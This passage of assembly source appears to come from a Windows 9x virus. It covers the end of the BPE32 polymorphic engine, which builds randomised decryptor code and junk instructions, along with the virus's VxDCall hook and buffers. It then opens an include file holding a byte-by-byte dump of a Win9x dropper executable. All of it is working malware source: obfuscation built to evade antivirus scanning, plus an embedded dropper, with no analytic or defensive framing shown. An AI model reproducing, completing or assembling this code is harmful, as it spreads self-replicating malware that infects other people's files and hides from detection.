1661. make_xor2 proc                  ;create XOR instruction
1662.     mov al, 81h
1663.     stosb
1664.     mov al, 0f0h
1665.     add al, bh
1666.     stosb
1667.     ret
1668. make_xor2 endp
1669.  
1670. greg2   proc                    ;1 parameter = source/count value
1671.     call get_reg                ;get register
1672.     cmp al, bl              ;already used ?
1673.     je greg2
1674.     cmp al, 5
1675.     je greg2
1676.     cmp al, bh
1677.     je greg2
1678.     mov bh, al
1679.  
1680.     mov ecx, [esp+4]            ;get parameter
1681.     push 5                  ;choose instructions
1682.     call random
1683.     test eax, eax
1684.     je s_next0
1685.     cmp al, 1
1686.     je s_next1
1687.     cmp al, 2
1688.     je s_next2
1689.     cmp al, 3
1690.     je s_next3
1691.  
1692.     mov al, 0b8h                ;MOV reg, random_value
1693.     add al, bh              ;XOR reg, value
1694.     stosb                   ;param = random_value xor value
1695.     push 0
1696.     call random
1697.     xor ecx, eax
1698.     stosd
1699.     call make_xor2
1700.     mov eax, ecx
1701.     jmp n_end2
1702. s_next0:mov al, 68h             ;PUSH random_value
1703.     stosb                   ;POP reg
1704.     push 0                  ;XOR reg, value
1705.     call random             ;result = random_value xor value
1706.     xchg eax, ecx
1707.     xor eax, ecx
1708.     stosd
1709.     mov al, 58h
1710.     add al, bh
1711.     stosb
1712.     call make_xor2
1713.     xchg eax, ecx
1714.     jmp n_end2
1715. s_next1:mov al, 0b8h                ;MOV EAX, random_value
1716.     stosb                   ;MOV reg, EAX
1717.     push 0                  ;SUB reg, value
1718.     call random             ;result = random_value - value
1719.     stosd
1720.     push eax
1721.     mov al, 8bh
1722.     stosb
1723.     mov al, 18h
1724.     or al, bh
1725.     rol al, 3
1726.     stosb
1727.     mov al, 81h
1728.     stosb
1729.     mov al, 0e8h
1730.     add al, bh
1731.     stosb
1732.     pop eax
1733.     sub eax, ecx
1734.     jmp n_end2
1735. s_next2:push ebx                ;XOR reg, reg
1736.     mov bl, bh              ;XOR reg, random_value
1737.     call make_xor               ;ADD reg, value
1738.     pop ebx                 ;result = random_value + value
1739.     call make_xor2
1740.     push 0
1741.     call random
1742.     sub ecx, eax
1743.     stosd
1744.     push ecx
1745.     call s_lbl
1746.     pop eax
1747.     jmp n_end2
1748. s_lbl:  mov al, 81h             ;create ADD reg, ... instruction
1749.     stosb
1750.     mov al, 0c0h
1751.     add al, bh
1752.     stosb
1753.     ret
1754. s_next3:push ebx                ;XOR reg, reg
1755.     mov bl, bh              ;ADD reg, random_value
1756.     call make_xor               ;XOR reg, value
1757.     pop ebx                 ;result = random_value xor value
1758.     push 0
1759.     call random
1760.     push eax
1761.     xor eax, ecx
1762.     xchg eax, ecx
1763.     call s_lbl
1764.     xchg eax, ecx
1765.     stosd
1766.     call make_xor2
1767.     pop eax
1768. n_end2: stosd
1769.     push esi
1770.     call rjunk
1771.     pop esi
1772.     ret Pshd
1773. greg2   endp
1774.  
1775. greg3   proc
1776.     call get_reg                ;get register
1777.     cmp al, 5               ;already used ?
1778.     je greg3
1779.     cmp al, bl
1780.     je greg3
1781.     cmp al, bh
1782.     je greg3
1783.     cmp al, cl
1784.     je greg3
1785.     mov ch, al
1786.     mov edx, 12345678h          ;get encryption key value
1787. xor_key = dword ptr $ - 4
1788.  
1789.     push 3
1790.     call random
1791.     test eax, eax
1792.     je k_next1
1793.     cmp al, 1
1794.     je k_next2
1795.  
1796.     push ebx                ;XOR reg, reg
1797.     mov bl, ch              ;OR, ADD, XOR reg, value
1798.     call make_xor
1799.     pop ebx
1800.  
1801.     mov al, 81h
1802.     stosb
1803.     push 3
1804.     call random
1805.     test eax, eax
1806.     je k_nxt2
1807.     cmp al, 1
1808.     je k_nxt3
1809.  
1810.     mov al, 0c0h
1811. k_nxt1: add al, ch
1812.     stosb
1813.     xchg eax, edx
1814. n_end1: stosd
1815. k_end:  call rjunk
1816.     ret
1817. k_nxt2: mov al, 0f0h
1818.     jmp k_nxt1
1819. k_nxt3: mov al, 0c8h
1820.     jmp k_nxt1
1821. k_next1:mov al, 0b8h                ;MOV reg, value
1822.     jmp k_nxt1
1823. k_next2:mov al, 68h             ;PUSH value
1824.     stosb                   ;POP reg
1825.     xchg eax, edx
1826.     stosd
1827.     mov al, ch
1828.     sub al, -58h
1829.     jmp i_end1
1830. greg3   endp
1831.  
1832. greg4   proc
1833.     mov edx, 12345678h          ;get key increment value
1834. key_inc = dword ptr $ - 4
1835. i_next: push 3
1836.     call random
1837.     test eax, eax
1838.     je i_next0
1839.     cmp al, 1
1840.     je i_next1
1841.     cmp al, 2
1842.     je i_next2
1843.  
1844.     mov al, 90h             ;XCHG EAX, reg
1845.     add al, ch              ;XOR reg, reg
1846.     stosb                   ;OR reg, EAX
1847.     push ebx                ;ADD reg, value
1848.     mov bl, ch
1849.     call make_xor
1850.     pop ebx
1851.     mov al, 0bh
1852.     stosb
1853.     mov al, 18h
1854.     add al, ch
1855.     rol al, 3
1856.     stosb
1857. i_next0:mov al, 81h             ;ADD reg, value
1858.     stosb
1859.     mov al, 0c0h
1860.     add al, ch
1861.     stosb
1862.     xchg eax, edx
1863.     jmp n_end1
1864. i_next1:mov al, 0b8h                ;MOV EAX, value
1865.     stosb                   ;ADD reg, EAX
1866.     xchg eax, edx
1867.     stosd
1868.     mov al, 3
1869.     stosb
1870.     mov al, 18h
1871.     or al, ch
1872.     rol al, 3
1873. i_end1: stosb
1874. i_end2: call rjunk
1875.     ret
1876. i_next2:mov al, 8bh             ;MOV EAX, reg
1877.     stosb                   ;ADD EAX, value
1878.     mov al, 0c0h                ;XCHG EAX, reg
1879.     add al, ch
1880.     stosb
1881.     mov al, 5
1882.     stosb
1883.     xchg eax, edx
1884.     stosd
1885.     mov al, 90h
1886.     add al, ch
1887.     jmp i_end1
1888. greg4   endp
1889.  
1890. greg5   proc
1891.     push ecx
1892.     mov ch, bh
1893.     push 4
1894.     pop edx
1895.     push 2
1896.     call random
1897.     test eax, eax
1898.     jne ng5
1899.     call i_next             ;same as previous, value=4
1900.     pop ecx
1901.     jmp k_end
1902. ng5:    mov al, 40h             ;4x inc reg
1903.     add al, ch
1904.     pop ecx
1905.     stosb
1906.     stosb
1907.     stosb
1908.     jmp i_end1
1909. greg5   endp
1910.  
1911. greg6   proc
1912.     push 5
1913.     call random
1914.     test eax, eax
1915.     je d_next0
1916.     cmp al, 1
1917.     je d_next1
1918.     cmp al, 2
1919.     je d_next2
1920.  
1921.     mov al, 83h             ;SUB reg, 1
1922.     stosb
1923.     mov al, 0e8h
1924.     add al, cl
1925.     stosb
1926.     mov al, 1
1927.     jmp i_end1
1928. d_next0:mov al, 48h             ;DEC reg
1929.     add al, cl
1930.     jmp i_end1
1931. d_next1:mov al, 0b8h                ;MOV EAX, random_value
1932.     stosb                   ;SUB reg, EAX
1933.     push 0                  ;ADD reg, random_value-1
1934.     call random
1935.     mov edx, eax
1936.     stosd
1937.     mov al, 2bh
1938.     stosb
1939.     mov al, 18h
1940.     add al, cl
1941.     rol al, 3
1942.     stosb
1943.     mov al, 81h
1944.     stosb
1945.     mov al, 0c0h
1946.     add al, cl
1947.     stosb
1948.     dec edx
1949.     mov eax, edx
1950.     jmp n_end1
1951. d_next2:mov al, 90h             ;XCHG EAX, reg
1952.     add al, cl              ;DEC EAX
1953.     stosb                   ;XCHG EAX, reg
1954.     mov al, 48h
1955.     stosb
1956.     mov al, 90h
1957.     add al, cl
1958.     jmp i_end1
1959. greg6   endp
1960.  
1961. greg7   proc
1962.     mov edx, [esp+4]
1963.     dec edx
1964.     push 2
1965.     call random
1966.     test eax, eax
1967.     je l_next0
1968.     mov al, 51h             ;PUSH ECX
1969.     stosb                   ;MOV ECX, reg
1970.     mov al, 8bh             ;JECXZ label
1971.     stosb                   ;POP ECX
1972.     mov al, 0c8h                ;JMP decrypt_loop
1973.     add al, cl              ;label:
1974.     stosb                   ;POP ECX
1975.     mov eax, 0eb5903e3h
1976.     stosd
1977.     sub edx, edi
1978.     mov al, dl
1979.     stosb
1980.     mov al, 59h
1981.     jmp l_next
1982. l_next0:push ebx                ;XOR EAX, EAX
1983.     xor bl, bl              ;DEC EAX
1984.     call make_xor               ;ADD EAX, reg
1985.     pop ebx                 ;JNS decrypt_loop
1986.     mov al, 48h
1987.     stosb
1988.     mov al, 3
1989.     stosb
1990.     mov al, 0c0h
1991.     add al, cl
1992.     stosb
1993.     mov al, 79h
1994.     stosb
1995.     sub edx, edi
1996.     mov al, dl
1997. l_next: stosb
1998.     call rjunk
1999.     ret Pshd
2000. greg7   endp
2001.  
2002. rjunkjc:push 7
2003.     call random
2004.     jmp rjn
2005. rjunk   proc            ;junk instruction generator
2006.     push 8
2007.     call random     ;0=5, 1=1+2, 2=2+1, 3=1, 4=2, 5=3, 6=none, 7=dummy jump and call
2008. rjn:    test eax, eax
2009.     je j5
2010.     cmp al, 1
2011.     je j_1x2
2012.     cmp al, 2
2013.     je j_2x1
2014.     cmp al, 4
2015.     je j2
2016.     cmp al, 5
2017.     je j3
2018.     cmp al, 6
2019.     je r_end
2020.     cmp al, 7
2021.     je jcj
2022.  
2023. j1: call junx1      ;one byte junk instruction
2024.     nop
2025.     dec eax
2026.     cmc
2027.     inc eax
2028.     clc
2029.     cwde
2030.     stc
2031.     cld
2032. junx1:  pop esi
2033.     push 8
2034.     call random
2035.     add esi, eax
2036.     movsb
2037.     ret
2038. j_1x2:  call j1         ;one byte and two byte
2039.     jmp j2
2040. j_2x1:  call j2         ;two byte and one byte
2041.     jmp j1
2042. j3: call junx3
2043.     db  0c1h, 0c0h  ;rol eax, ...
2044.     db  0c1h, 0e0h  ;shl eax, ...
2045.     db  0c1h, 0c8h  ;ror eax, ...
2046.     db  0c1h, 0e8h  ;shr eax, ...
2047.     db  0c1h, 0d0h  ;rcl eax, ...
2048.     db  0c1h, 0f8h  ;sar eax, ...
2049.     db  0c1h, 0d8h  ;rcr eax, ...
2050.     db  083h, 0c0h
2051.     db  083h, 0c8h
2052.     db  083h, 0d0h
2053.     db  083h, 0d8h
2054.     db  083h, 0e0h
2055.     db  083h, 0e8h
2056.     db  083h, 0f0h
2057.     db  083h, 0f8h  ;cmp eax, ...
2058.     db  0f8h, 072h  ;clc; jc ...
2059.     db  0f9h, 073h  ;stc; jnc ...
2060.  
2061. junx3:  pop esi         ;three byte junk instruction
2062.     push 17
2063.     call random
2064.     imul eax, 2
2065.     add esi, eax
2066.     movsb
2067.     movsb
2068. r_ran:  push 0
2069.     call random
2070.     test al, al
2071.     je r_ran
2072.     stosb
2073.     ret
2074. j2: call junx2
2075.     db  8bh     ;mov eax, ...
2076.     db  03h     ;add eax, ...
2077.     db  13h     ;adc eax, ...
2078.     db  2bh     ;sub eax, ...
2079.     db  1bh     ;sbb eax, ...
2080.     db  0bh     ;or eax, ...
2081.     db  33h     ;xor eax, ...
2082.     db  23h     ;and eax, ...
2083.     db  33h     ;test eax, ...
2084.  
2085. junx2:  pop esi         ;two byte junk instruction
2086.     push 9
2087.     call random
2088.     add esi, eax
2089.     movsb
2090.     push 8
2091.     call random
2092.     sub al, -11000000b
2093.     stosb
2094. r_end:  ret
2095. j5: call junx5
2096.     db  0b8h        ;mov eax, ...
2097.     db  05h     ;add eax, ...
2098.     db  15h     ;adc eax, ...
2099.     db  2dh     ;sub eax, ...
2100.     db  1dh     ;sbb eax, ...
2101.     db  0dh     ;or eax, ...
2102.     db  35h     ;xor eax, ...
2103.     db  25h     ;and eax, ...
2104.     db  0a9h        ;test eax, ...
2105.     db  3dh     ;cmp eax, ...
2106.  
2107. junx5:  pop esi         ;five byte junk instruction
2108.     push 10
2109.     call random
2110.     add esi, eax
2111.     movsb
2112.     push 0
2113.     call random
2114.     stosd
2115.     ret
2116. jcj:    call rjunkjc        ;junk
2117.     push edx        ;CALL label1
2118.     push ebx        ;junk
2119.     push ecx        ;JMP label2
2120.     mov al, 0e8h        ;junk
2121.     stosb           ;label1: junk
2122.     push edi        ;RET
2123.     stosd           ;junk
2124.     push edi        ;label2:
2125.     call rjunkjc        ;junk
2126.     mov al, 0e9h
2127.     stosb
2128.     mov ecx, edi
2129.     stosd
2130.     mov ebx, edi
2131.     call rjunkjc
2132.     pop eax
2133.     sub eax, edi
2134.     neg eax
2135.     mov edx, edi
2136.     pop edi
2137.     stosd
2138.     mov edi, edx
2139.     call rjunkjc
2140.     mov al, 0c3h
2141.     stosb
2142.     call rjunkjc
2143.     sub ebx, edi
2144.     neg ebx
2145.     xchg eax, ebx
2146.     push edi
2147.     mov edi, ecx
2148.     stosd
2149.     pop edi
2150.     call rjunkjc
2151.     pop ecx
2152.     pop ebx
2153.     pop edx
2154.     ret
2155. rjunk   endp
2156. BPE32     EndP          ;BPE32 ends here
2157. VxDCall_hook    EndP
2158.  
2159.  
2160. d1start:include drop1.inc
2161. d1size = dword ptr $ - d1start
2162.  
2163. d2start:include drop2.inc
2164. d2size = dword ptr $ - d2start
2165.  
2166.  
2167. virus_end:
2168. VxDCall0    dd  ?
2169. VxDCall_addr    db  6 dup (?)
2170. targetname  db  MAX_PATH dup (?)
2171. tmpname     db  8 dup (?)
2172. header      db  4+IMAGE_SIZEOF_FILE_HEADER \
2173.             +IMAGE_SIZEOF_NT_OPTIONAL_HEADER dup (?)
2174. section_header  db  IMAGE_SIZEOF_SECTION_HEADER dup (?)
2175.  
2176.         db  512 dup (?)
2177. threadstack:
2178. virus_in_arc    db  3000h dup (?)
2179. crypted_virus   db  2000h dup (?)
2180. size_unint = $ - virus_end
2181.  
2182.  
2183. workspace1  db  16 dup (?)
2184. workspace2  db  16 dup (?)
2185. ends
2186. End first_gen
2187. �������������������������������������������������������������������[bg.asm]���
2188. ����������������������������������������������������������������[drop1.inc]���
2189. ;First part of Win9X dropper
2190.         db  4Dh ; M
2191.         db  5Ah ; Z
2192.         db  50h ; P
2193.         db    0 ;  
2194.         db    2 ;  
2195.         db    0 ;  
2196.         db    0 ;  
2197.         db    0 ;  
2198.         db    4 ;  
2199.         db    0 ;  
2200.         db  0Fh ;  
2201.         db    0 ;  
2202.         db 0FFh ;  
2203.         db 0FFh ;  
2204.         db    0 ;  
2205.         db    0 ;  
2206.         db 0B8h ; �
2207.         db    0 ;  
2208.         db    0 ;  
2209.         db    0 ;  
2210.         db    0 ;  
2211.         db    0 ;  
2212.         db    0 ;  
2213.         db    0 ;  
2214.         db  40h ; @
2215.         db    0 ;  
2216.         db  1Ah ;  
2217.         db    0 ;  
2218.         db    0 ;  
2219.         db    0 ;  
2220.         db    0 ;  
2221.         db    0 ;  
2222.         db    0 ;  
2223.         db    0 ;  
2224.         db    0 ;  
2225.         db    0 ;  
2226.         db    0 ;  
2227.         db    0 ;  
2228.         db    0 ;  
2229.         db    0 ;  
2230.         db    00ah
2231.         db    029h
2232.         db    000h
2233.         db    030h
2234.         db    0
2235.         db    0
2236.         db    0 ;  
2237.         db    0 ;  
2238.         db    0 ;  
2239.         db    0 ;  
2240.         db    0 ;  
2241.         db    0 ;  
2242.         db    0 ;  
2243.         db    0 ;  
2244.         db    0 ;  
2245.         db    0 ;  
2246.         db    0 ;  
2247.         db    0 ;  
2248.         db    0 ;  
2249.         db    0 ;  
2250.         db    0 ;  
2251.         db    1 ;  
2252.         db    0 ;  
2253.         db    0 ;  
2254.         db 0BAh ; �
2255.         db  10h ;  
2256.         db    0 ;  
2257.         db  0Eh ;  
2258.         db  1Fh ;  
2259.         db 0B4h ; �
2260.         db    9 ;  
2261.         db 0CDh ; �
2262.         db  21h ; !
2263.         db 0B8h ; �
2264.         db    1 ;  
2265.         db  4Ch ; L
2266.         db 0CDh ; �
2267.         db  21h ; !
2268.         db  90h ; �
2269.         db  90h ; �
2270.         db  54h ; T
2271.         db  68h ; h
2272.         db  69h ; i
2273.         db  73h ; s
2274.         db  20h ;  
2275.         db  70h ; p
2276.         db  72h ; r
2277.         db  6Fh ; o
2278.         db  67h ; g
2279.         db  72h ; r
2280.         db  61h ; a
2281.         db  6Dh ; m
2282.         db  20h ;  
2283.         db  6Dh ; m
2284.         db  75h ; u
2285.         db  73h ; s
2286.         db  74h ; t
2287.         db  20h ;  
2288.         db  62h ; b
2289.         db  65h ; e
2290.         db  20h ;  
2291.         db  72h ; r
2292.         db  75h ; u
2293.         db  6Eh ; n
2294.         db  20h ;  
2295.         db  75h ; u
2296.         db  6Eh ; n
2297.         db  64h ; d
2298.         db  65h ; e
2299.         db  72h ; r
2300.         db  20h ;  
2301.         db  57h ; W
2302.         db  69h ; i
2303.         db  6Eh ; n
2304.         db  33h ; 3
2305.         db  32h ; 2
2306.         db  0Dh ;  
2307.         db  0Ah ;  
2308.         db  24h ; $
2309.         db  37h ; 7
2310.         db    0 ;  
2311.         db    0 ;  
2312.         db    0 ;  
2313.         db    0 ;  
2314.         db    0 ;  
2315.         db    0 ;  
2316.         db    0 ;  
2317.         db    0 ;  
2318.         db    0 ;  
2319.         db    0 ;  
2320.         db    0 ;  
2321.         db    0 ;  
2322.         db    0 ;  
2323.         db    0 ;  
2324.         db    0 ;  
2325.         db    0 ;  
2326.         db    0 ;  
2327.         db    0 ;  
2328.         db    0 ;  
2329.         db    0 ;  
2330.         db    0 ;  
2331.         db    0 ;  
2332.         db    0 ;  
2333.         db    0 ;  
2334.         db    0 ;  
2335.         db    0 ;  
2336.         db    0 ;  
2337.         db    0 ;  
2338.         db    0 ;  
2339.         db    0 ;  
2340.         db    0 ;  
2341.         db    0 ;  
2342.         db    0 ;  
2343.         db    0 ;  
2344.         db    0 ;  
2345.         db    0 ;  
2346.         db    0 ;  
2347.         db    0 ;  
2348.         db    0 ;  
2349.         db    0 ;  
2350.         db    0 ;  
2351.         db    0 ;  
2352.         db    0 ;  
2353.         db    0 ;  
2354.         db    0 ;  
2355.         db    0 ;  
2356.         db    0 ;  
2357.         db    0 ;  
2358.         db    0 ;  
2359.         db    0 ;  
2360.         db    0 ;  
2361.         db    0 ;  
2362.         db    0 ;  
2363.         db    0 ;  
2364.         db    0 ;  
2365.         db    0 ;  
2366.         db    0 ;  
2367.         db    0 ;  
2368.         db    0 ;  
2369.         db    0 ;  
2370.         db    0 ;  
2371.         db    0 ;  
2372.         db    0 ;  
2373.         db    0 ;  
2374.         db    0 ;  
2375.         db    0 ;  
2376.         db    0 ;  
2377.         db    0 ;  
2378.         db    0 ;  
2379.         db    0 ;  
2380.         db    0 ;  
2381.         db    0 ;  
2382.         db    0 ;  
2383.         db    0 ;  
2384.         db    0 ;  
2385.         db    0 ;  
2386.         db    0 ;  
2387.         db    0 ;  
2388.         db    0 ;  
2389.         db    0 ;  
2390.         db    0 ;  
2391.         db    0 ;  
2392.         db    0 ;  
2393.         db    0 ;  
2394.         db    0 ;  
2395.         db    0 ;  
2396.         db    0 ;  
2397.         db    0 ;  
2398.         db    0 ;  
2399.         db    0 ;  
2400.         db    0 ;  
2401.         db    0 ;  
2402.         db    0 ;  
2403.         db    0 ;  
2404.         db    0 ;  
2405.         db    0 ;  
2406.         db    0 ;  
2407.         db    0 ;  
2408.         db    0 ;  
2409.         db    0 ;  
2410.         db    0 ;  
2411.         db    0 ;  
2412.         db    0 ;  
2413.         db    0 ;  
2414.         db    0 ;  
2415.         db    0 ;  
2416.         db    0 ;  
2417.         db    0 ;  
2418.         db    0 ;  
2419.         db    0 ;  
2420.         db    0 ;  
2421.         db    0 ;  
2422.         db    0 ;  
2423.         db    0 ;  
2424.         db    0 ;  
2425.         db    0 ;  
2426.         db    0 ;  
2427.         db    0 ;  
2428.         db    0 ;  
2429.         db    0 ;  
2430.         db    0 ;  
2431.         db    0 ;  
2432.         db    0 ;  
2433.         db    0 ;  
2434.         db    0 ;  
2435.         db    0 ;  
2436.         db    0 ;  
2437.         db    0 ;  
2438.         db    0 ;  
2439.         db    0 ;  
2440.         db    0 ;  
2441.         db    0 ;  
2442.         db    0 ;  
2443.         db    0 ;  
2444.         db    0 ;  
2445.         db    0 ;  
2446.         db  50h ; P
2447.         db  45h ; E
2448.         db    0 ;  
2449.         db    0 ;  
2450.         db  4Ch ; L
2451.         db    1 ;  
2452.         db    4 ;  
2453.         db    0 ;  
2454.         db 0C6h ; �
2455.         db  24h ; $
2456.         db  7Ch ; |
2457.         db  5Fh ; _
2458.         db    0 ;  
2459.         db    0 ;  
2460.         db    0 ;  
2461.         db    0 ;  
2462.         db    0 ;  
2463.         db    0 ;  
2464.         db    0 ;  
2465.         db    0 ;  
2466.         db 0E0h ; �
2467.         db    0 ;  
2468.         db  8Eh ; �
2469.         db  81h ; �
2470.         db  0Bh ;  
2471.         db    1 ;  
2472.         db    2 ;  
2473.         db  19h ;  
2474.         db    0 ;  
2475.         db  22h ; "
2476.         db    0 ;  
2477.         db    0 ;  
2478.         db    0 ;  
2479.         db    4 ;  
2480.         db    0 ;  
2481.         db    0 ;  
2482.         db    0 ;  
2483.         db    0 ;  
2484.         db    0 ;  
2485.         db    0 ;  
2486.         db    0 ;  
2487.         db  10h ;  
2488.         db    0 ;  
2489.         db    0 ;  
2490.         db    0 ;  
2491.         db  10h ;  
2492.         db    0 ;  
2493.         db    0 ;  
2494.         db    0 ;  
2495.         db  40h ; @
2496.         db    0 ;  
2497.         db    0 ;  
2498.         db    0 ;  
2499.         db    0 ;  
2500.         db  40h ; @
2501.         db    0 ;  
2502.         db    0 ;  
2503.         db  10h ;  
2504.         db    0 ;  
2505.         db    0 ;  
2506.         db    0 ;  
2507.         db    2 ;  
2508.         db    0 ;  
2509.         db    0 ;  
2510.         db    1 ;  
2511.         db    0 ;  
2512.         db    0 ;  
2513.         db    0 ;  
2514.         db    0 ;  
2515.         db    0 ;  
2516.         db    0 ;  
2517.         db    0 ;  
2518.         db    3 ;  
2519.         db    0 ;  
2520.         db  0Ah ;  
2521.         db    0 ;  
2522.         db    0 ;  
2523.         db    0 ;  
2524.         db    0 ;  
2525.         db    0 ;  
2526.         db    0 ;  
2527.         db  70h ; p
2528.         db    0 ;  
2529.         db    0 ;  
2530.         db    0 ;  
2531.         db    4 ;  
2532.         db    0 ;  
2533.         db    0 ;  
2534.         db    0 ;  
2535.         db    0 ;  
2536.         db    0 ;  
2537.         db    0 ;  
2538.         db    2 ;  
2539.         db    0 ;  
2540.         db    0 ;  
2541.         db    0 ;  
2542.         db    0 ;  
2543.         db    0 ;  
2544.         db  10h ;  
2545.         db    0 ;  
2546.         db    0 ;  
2547.         db  20h ;  
2548.         db    0 ;  
2549.         db    0 ;  
2550.         db    0 ;  
2551.         db    0 ;  
2552.         db  10h ;  
2553.         db    0 ;  
2554.         db    0 ;  
2555.         db  10h ;  
2556.         db    0 ;  
2557.         db    0 ;  
2558.         db    0 ;  
2559.         db    0 ;  
2560.         db    0 ;  
2561.         db    0 ;  
2562.         db  10h ;  
2563.         db    0 ;  
2564.         db    0 ;  
2565.         db    0 ;  
2566.         db    0 ;  
2567.         db    0 ;  
2568.         db    0 ;  
2569.         db    0 ;  
2570.         db    0 ;  
2571.         db    0 ;  
2572.         db    0 ;  
2573.         db    0 ;  
2574.         db    0 ;  
2575.         db  50h ; P
2576.         db    0 ;  
2577.         db    0 ;  
2578.         db  54h ; T
2579.         db    0 ;  
2580.         db    0 ;  
2581.         db    0 ;  
2582.         db    0 ;  
2583.         db    0 ;  
2584.         db    0 ;  
2585.         db    0 ;  
2586.         db    0 ;  
2587.         db    0 ;  
2588.         db    0 ;  
2589.         db    0 ;  
2590.         db    0 ;  
2591.         db    0 ;  
2592.         db    0 ;  
2593.         db    0 ;  
2594.         db    0 ;  
2595.         db    0 ;  
2596.         db    0 ;  
2597.         db    0 ;  
2598.         db    0 ;  
2599.         db    0 ;  
2600.         db    0 ;  
2601.         db    0 ;  
2602.         db    0 ;  
2603.         db    0 ;  
2604.         db    0 ;  
2605.         db    0 ;  
2606.         db    0 ;  
2607.         db  60h ; `
2608.         db    0 ;  
2609.         db    0 ;  
2610.         db  0Ch ;  
2611.         db    0 ;  
2612.         db    0 ;  
2613.         db    0 ;  
2614.         db    0 ;  
2615.         db    0 ;  
2616.         db    0 ;  
2617.         db    0 ;  
2618.         db    0 ;  
2619.         db    0 ;  
2620.         db    0 ;  
2621.         db    0 ;  
2622.         db    0 ;  
2623.         db    0 ;  
2624.         db    0 ;  
2625.         db    0 ;  
2626.         db    0 ;  
2627.         db    0 ;  
2628.         db    0 ;  
2629.         db    0 ;  
2630.         db    0 ;  
2631.         db    0 ;  
2632.         db    0 ;  
2633.         db    0 ;  
2634.         db    0 ;  
2635.         db    0 ;  
2636.         db    0 ;  
2637.         db    0 ;  
2638.         db    0 ;  
2639.         db    0 ;  
2640.         db    0 ;  
2641.         db    0 ;  
2642.         db    0 ;  
2643.         db    0 ;  
2644.         db    0 ;  
2645.         db    0 ;  
2646.         db    0 ;  
2647.         db    0 ;  
2648.         db    0 ;  
2649.         db    0 ;  
2650.         db    0 ;  
2651.         db    0 ;  
2652.         db    0 ;  
2653.         db    0 ;  
2654.         db    0 ;  
2655.         db    0 ;  
2656.         db    0 ;  
2657.         db    0 ;  
2658.         db    0 ;  
2659.         db    0 ;  
2660.         db    0 ;  
2661.         db    0 ;  
2662.         db    0 ;  
2663.         db    0 ;  
2664.         db    0 ;  
2665.         db    0 ;  
2666.         db    0 ;  
2667.         db    0 ;  
2668.         db    0 ;  
2669.         db    0 ;  
2670.         db    0 ;  
2671.         db    0 ;  
2672.         db    0 ;  
2673.         db    0 ;  
2674.         db    0 ;  
2675.         db    0 ;  
2676.         db    0 ;  
2677.         db    0 ;  
2678.         db    0 ;  
2679.         db    0 ;  
2680.         db    0 ;  
2681.         db    0 ;  
2682.         db    0 ;  
2683.         db    0 ;  
2684.         db    0 ;  
2685.         db    0 ;  
2686.         db    0 ;  
2687.         db    0 ;  
2688.         db    0 ;  
2689.         db    0 ;  
2690.         db    0 ;  
2691.         db    0 ;  
2692.         db    0 ;  
2693.         db    0 ;  
2694.         db  43h ; C
2695.         db  4Fh ; O
2696.         db  44h ; D
2697.         db  45h ; E
2698.         db    0 ;  
2699.         db    0 ;  
2700.         db    0 ;  
2701.         db    0 ;  
2702.         db    0 ;  
2703.         db  30h ; 0
2704.         db    0 ;  
2705.         db    0 ;  
2706.         db    0 ;  
2707.         db  10h ;  
2708.         db    0 ;  
2709.         db    0 ;  
2710.         db    0 ;  
2711.         db  22h ; "
2712.         db    0 ;  
2713.         db    0 ;  
2714.         db    0 ;  
2715.         db    6 ;  
2716.         db    0 ;  
2717.         db    0 ;  
2718.         db    0 ;  
2719.         db    0 ;  
2720.         db    0 ;  
2721.         db    0 ;  
2722.         db    0 ;  
2723.         db    0 ;  
2724.         db    0 ;  
2725.         db    0 ;  
2726.         db    0 ;  
2727.         db    0 ;  
2728.         db    0 ;  
2729.         db    0 ;  
2730.         db  20h ;  
2731.         db    0 ;  
2732.         db    0 ;  
2733.         db 0E0h ; �
2734.         db  44h ; D
2735.         db  41h ; A
2736.         db  54h ; T
2737.         db  41h ; A
2738.         db    0 ;  
2739.         db    0 ;  
2740.         db    0 ;  
2741.         db    0 ;  
2742.         db    0 ;  
2743.         db  10h ;  
2744.         db    0 ;  
2745.         db    0 ;  
2746.         db    0 ;  
2747.         db  40h ; @
2748.         db    0 ;  
2749.         db    0 ;  
2750.         db    0 ;  
2751.         db    0 ;  
2752.         db    0 ;  
2753.         db    0 ;  
2754.         db    0 ;  
2755.         db  28h ; (
2756.         db    0 ;  
2757.         db    0 ;  
2758.         db    0 ;  
2759.         db    0 ;  
2760.         db    0 ;  
2761.         db    0 ;  
2762.         db    0 ;  
2763.         db    0 ;  
2764.         db    0 ;  
2765.         db    0 ;  
2766.         db    0 ;  
2767.         db    0 ;  
2768.         db    0 ;  
2769.         db    0 ;  
2770.         db  40h ; @
2771.         db    0 ;  
2772.         db    0 ;  
2773.         db 0C0h ; �
2774.         db  2Eh ; .
2775.         db  69h ; i
2776.         db  64h ; d
2777.         db  61h ; a
2778.         db  74h ; t
2779.         db  61h ; a
2780.         db    0 ;  
2781.         db    0 ;  
2782.         db    0 ;  
2783.         db  10h ;  
2784.         db    0 ;  
2785.         db    0 ;  
2786.         db    0 ;  
2787.         db  50h ; P
2788.         db    0 ;  
2789.         db    0 ;  
2790.         db    0 ;  
2791.         db    2 ;  
2792.         db    0 ;  
2793.         db    0 ;  
2794.         db    0 ;  
2795.         db  28h ; (
2796.         db    0 ;  
2797.         db    0 ;  
2798.         db    0 ;  
2799.         db    0 ;  
2800.         db    0 ;  
2801.         db    0 ;  
2802.         db    0 ;  
2803.         db    0 ;  
2804.         db    0 ;  
2805.         db    0 ;  
2806.         db    0 ;  
2807.         db    0 ;  
2808.         db    0 ;  
2809.         db    0 ;  
2810.         db  40h ; @
2811.         db    0 ;  
2812.         db    0 ;  
2813.         db 0C0h ; �
2814.         db  2Eh ; .
2815.         db  72h ; r
2816.         db  65h ; e
2817.         db  6Ch ; l
2818.         db  6Fh ; o
2819.         db  63h ; c
2820.         db    0 ;  
2821.         db    0 ;  
2822.         db    0 ;  
2823.         db  10h ;  
2824.         db    0 ;  
2825.         db    0 ;  
2826.         db    0 ;  
2827.         db  60h ; `
2828.         db    0 ;  
2829.         db    0 ;  
2830.         db    0 ;  
2831.         db    2 ;  
2832.         db    0 ;  
2833.         db    0 ;  
2834.         db    0 ;  
2835.         db  2Ah ; *
2836.         db    0 ;  
2837.         db    0 ;  
2838.         db    0 ;  
2839.         db    0 ;  
2840.         db    0 ;  
2841.         db    0 ;  
2842.         db    0 ;  
2843.         db    0 ;  
2844.         db    0 ;  
2845.         db    0 ;  
2846.         db    0 ;  
2847.         db    0 ;  
2848.         db    0 ;  
2849.         db    0 ;  
2850.         db  40h ; @
2851.         db    0 ;  
2852.         db    0 ;  
2853.         db  50h ; P
2854.         db    0 ;  
2855.         db    0 ;  
2856.         db    0 ;  
2857.         db    0 ;  
2858.         db    0 ;  
